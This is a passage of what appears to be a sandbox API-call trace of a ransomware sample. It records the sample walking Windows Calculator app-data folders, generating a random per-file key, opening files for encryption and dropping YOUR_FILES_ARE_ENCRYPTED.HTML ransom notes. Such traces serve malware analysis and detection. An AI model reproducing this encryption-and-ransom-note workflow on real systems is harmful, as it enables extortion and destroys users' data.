ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.023] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56e8eb1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56e8eb1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.023] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.023] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 188 [0120.023] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.024] lstrlenW (lpString=".dat") returned 4 [0120.024] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.024] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\microsoft.windowscalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.024] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8192) returned 1 [0120.024] GetProcessHeap () returned 0x600000 [0120.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.027] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="88") returned 2 [0120.027] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="D6") returned 2 [0120.027] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="8C") returned 2 [0120.027] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="68") returned 2 [0120.027] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="6C") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="98") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="CA") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="FD") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="20") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="92") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="82") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="D1") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="DA") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="8F") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="7D") returned 2 [0120.027] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="EE") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="AF") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="1C") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="50") returned 2 [0120.028] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="95") returned 2 [0120.028] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="1D") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="27") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="F8") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="D4") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="E5") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="D1") returned 2 [0120.028] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="1B") returned 2 [0120.028] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="6A") returned 2 [0120.028] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2C") returned 2 [0120.028] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6E") returned 2 [0120.028] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="AA") returned 2 [0120.028] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="56") returned 2 [0120.029] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.029] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.029] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.029] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x56b47287, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b47287, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b47287, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.029] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.029] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 193 [0120.029] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.029] lstrlenW (lpString=".LOG1") returned 5 [0120.029] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.029] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x56b47287, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b47287, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b47287, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.029] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.029] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 193 [0120.029] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.029] lstrlenW (lpString=".LOG2") returned 5 [0120.029] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.029] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x56b47287, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b47287, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b47287, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.032] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.034] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 198 [0120.034] GetProcessHeap () returned 0x600000 [0120.034] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\microsoft.windowscalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.036] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.037] CloseHandle (hObject=0x320) returned 1 [0120.037] GetProcessHeap () returned 0x600000 [0120.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.037] GetProcessHeap () returned 0x600000 [0120.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.037] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.037] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.037] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0120.037] GetProcessHeap () returned 0x600000 [0120.037] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\microsoft.windowscalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.041] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.042] CloseHandle (hObject=0x31c) returned 1 [0120.042] GetProcessHeap () returned 0x600000 [0120.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.042] GetProcessHeap () returned 0x600000 [0120.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.043] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.043] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.043] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState") returned 103 [0120.043] GetProcessHeap () returned 0x600000 [0120.043] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.044] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState" [0120.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\*" [0120.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.044] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.044] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.044] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.044] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0120.044] GetProcessHeap () returned 0x600000 [0120.044] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.045] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.046] CloseHandle (hObject=0x31c) returned 1 [0120.046] GetProcessHeap () returned 0x600000 [0120.046] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.046] GetProcessHeap () returned 0x600000 [0120.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.047] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.047] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.047] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings") returned 99 [0120.047] GetProcessHeap () returned 0x600000 [0120.047] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.048] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings" [0120.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\*" [0120.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.048] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.048] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x564b8c51, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x564b8c51, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.048] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.048] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 112 [0120.048] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.048] lstrlenW (lpString=".lock") returned 5 [0120.049] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.049] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.049] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.049] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat") returned 112 [0120.049] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.049] lstrlenW (lpString=".dat") returned 4 [0120.049] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.049] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.049] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.049] GetProcessHeap () returned 0x600000 [0120.049] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.052] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="FE") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="50") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="1B") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="5A") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CB") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="8F") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B9") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="54") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="ED") returned 